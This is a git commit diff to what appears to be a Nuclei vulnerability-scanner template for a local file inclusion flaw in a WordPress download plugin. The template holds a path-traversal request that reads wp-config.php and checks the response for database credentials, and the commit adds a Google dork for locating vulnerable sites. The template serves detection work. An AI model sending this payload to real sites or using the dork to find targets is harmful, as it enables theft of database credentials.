Update shortcode-lfi.yaml

2022-02-15 16:48:20 +05:30 · 2022-02-15 16:48:20 +05:30 · 6be4e7d1d3
parent 196f4449d9
commit 6be4e7d1d3
1 changed files with 5 additions and 6 deletions
--- a/vulnerabilities/wordpress/shortcode-lfi.yaml
+++ b/vulnerabilities/wordpress/shortcode-lfi.yaml
@ -5,24 +5,23 @@ info:
  author: dhiyaneshDK
  severity: high
  description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
-  reference:
-    - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
-  tags: wordpress,wp-plugin,lfi
+  reference: https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
+  metadata:
+    google-dork: inurl:wp/wp-content/force-download.php
+  tags: wordpress,wp-plugin,lfi,shortcode,wp

 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/wp/wp-content/force-download.php?file=../wp-config.php'
      - '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'

-    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
+        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
-        part: body
        condition: and

      - type: status